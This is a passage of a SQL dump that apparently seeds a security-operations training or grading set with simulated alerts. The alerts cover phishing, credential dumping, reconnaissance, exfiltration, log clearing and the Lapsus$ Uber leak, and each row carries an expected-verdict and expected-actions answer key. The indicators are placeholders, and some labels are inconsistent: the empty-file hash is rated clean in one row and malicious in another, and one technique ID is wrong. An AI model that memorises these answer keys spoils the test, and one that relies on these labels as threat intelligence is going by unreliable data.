update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(887, 'Persistence through Compromised Credentials', 'high', 'Credential storage systems', 'An attacker accessed Slack and retrieved exposed credentials, utilizing them to maintain persistent access within the network. The retrieved credentials were then used to access several internal systems.', 'Credential Dumping', 'T1003.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"credential_access\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.5\",\"user\":\"compromised_user\",\"retrieved_credentials\":[{\"type\":\"password\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},{\"type\":\"token\",\"value\":\"xoxb-2398473284-2398478234-2398478234\"}],\"accessed_systems\":[\"192.168.1.10\",\"192.168.1.11\"],\"filename\":\"cred_dump.log\",\"event_id\":\"evt-2023-10-12-001\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous credential dumping activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host used as a pivot point.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Password Hash Database\",\"verdict\":\"malicious\",\"details\":\"Known password hash for \'password\'.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cred_dump.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Log Files\",\"verdict\":\"clean\",\"details\":\"Log file generated during credential access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(888, 'Lateral Movement to Critical Systems', 'high', 'Network traffic analysis', 'Anomalous network traffic detected indicative of internal reconnaissance activity. The attacker appears to be mapping out critical systems, likely preparing for further lateral movement and potential data exfiltration.', 'Internal Reconnaissance', 'T1049: System Network Connections Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:28Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.12\",\"protocol\":\"TCP\",\"destination_port\":445,\"user\":\"jdoe\",\"file_accessed\":\"critical_data.xlsx\",\"external_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"access_attempt\",\"status\":\"failed\",\"reason\":\"access_denied\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Known internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Critical system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"suspicious\",\"details\":\"IP address associated with previous reconnaissance activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"clean\",\"details\":\"Commonly occurring hash, likely not malicious.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"critical_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_inventory\",\"verdict\":\"internal\",\"details\":\"Sensitive file containing critical data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(889, 'Exfiltration of HackerOne Reports', 'critical', 'Data transfer logs', 'Targeting vulnerability reports, the attackers extract sensitive information, including zero-day vulnerabilities.', 'Data Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"source_ip\":\"10.54.23.101\",\"destination_ip\":\"192.168.1.15\",\"external_ip\":\"185.213.211.156\",\"user\":\"jdoe\",\"filename\":\"HackerOne_Report_Sept2023.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"destination_port\":443,\"protocol\":\"HTTPS\"}', '2026-01-15 00:57:25', '2026-02-16 17:56:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.54.23.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious data transfer.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.213.211.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous data breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"HackerOne_Report_Sept2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive vulnerability information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_repository\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious file activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"Unusual data access patterns detected for this user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.564Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"source_ip\\\":\\\"10.54.23.101\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"185.213.211.156\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"HackerOne_Report_Sept2023.zip\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(890, 'Cover Tracks Using Log Tampering', 'high', 'System logs', 'Advanced log manipulation detected. Attackers altered log entries to erase digital footprints. Obfuscation tactics employed to hinder detection and response efforts.', 'Defense Evasion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:18Z\",\"event_id\":1102,\"event_source\":\"Microsoft-Windows-Eventlog\",\"log_name\":\"Security\",\"message\":\"The audit log was cleared.\",\"user\":{\"account_name\":\"admin_user\",\"account_domain\":\"CORP\",\"logon_id\":\"0x3e7\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\"},\"file\":{\"file_name\":\"evtx_log_clear.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal source IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious external IP associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with log tampering tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evtx_log_clear.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"corporate_policy\",\"verdict\":\"suspicious\",\"details\":\"Unauthorized software used for log manipulation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:18Z\\\",\\\"event_id\\\":1102,\\\"event_source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"The audit log was cleared.\\\",\\\"user\\\":{\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CORP\\\",\\\"logon_id\\\":\\\"0x3e7\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"file_name\\\":\\\"evtx_log_clear.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(891, 'Final Stage: Public Disclosure and Exploitation', 'critical', 'Public forums and dark web', 'Lapsus$ has publicly disclosed stolen information, causing significant reputational harm to Uber. The data was released on multiple platforms, making it accessible to a wide audience, potentially leading to financial losses and further exploitation.', 'Information Operations', 'T1583 - Data Leak Sites', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"185.220.101.5\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"exfiltrated_filename\":\"uber_customer_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"forum_url\":\"http://darkwebforum.example/disclosure/uber-leak\",\"malicious_actor\":\"Lapsus$\",\"action\":\"Data Public Disclosure\",\"target\":\"Uber\"}', '2026-01-15 00:57:25', '2026-02-16 17:56:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Lapsus$ for malicious operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with leaked Uber data.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://darkwebforum.example/disclosure/uber-leak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Dark Web Monitoring\",\"verdict\":\"malicious\",\"details\":\"URL hosting the leaked Uber data.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.220.101.5\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_filename\\\":\\\"uber_customer_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"forum_url\\\":\\\"http://darkwebforum.example/disclosure/uber-leak\\\",\\\"malicious_actor\\\":\\\"Lapsus$\\\",\\\"action\\\":\\\"Data Public Disclosure\\\",\\\"target\\\":\\\"Uber\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.567Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 